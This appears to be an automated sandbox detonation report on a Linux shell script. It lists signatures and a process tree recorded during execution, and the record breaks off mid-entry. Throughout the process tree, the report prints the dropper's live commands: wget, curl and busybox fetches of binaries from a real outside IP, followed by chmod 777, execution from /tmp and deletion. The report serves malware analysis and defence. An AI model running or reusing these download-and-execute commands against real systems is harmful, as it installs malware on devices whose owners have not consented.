Analysis Overview
SHA256
fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939
Threat Level: Shows suspicious behavior
The file fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 03:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 03:52
Reported
2024-11-20 03:54
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
31s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
| N/A | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | N/A |
| N/A | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | N/A |
| N/A | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | N/A |
| N/A | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | N/A |
| N/A | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | N/A |
| N/A | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | N/A |
| N/A | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | N/A |
| N/A | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | N/A |
| N/A | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | N/A |
| N/A | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | N/A |
| N/A | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | N/A |
| N/A | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | N/A |
| N/A | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | N/A |
| N/A | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL | /usr/bin/curl | N/A |
Processes
/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh
[/tmp/fbca926a194f3a16d4f651f15e8348a9b3c95ba55cba7c8c59266451178da939.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
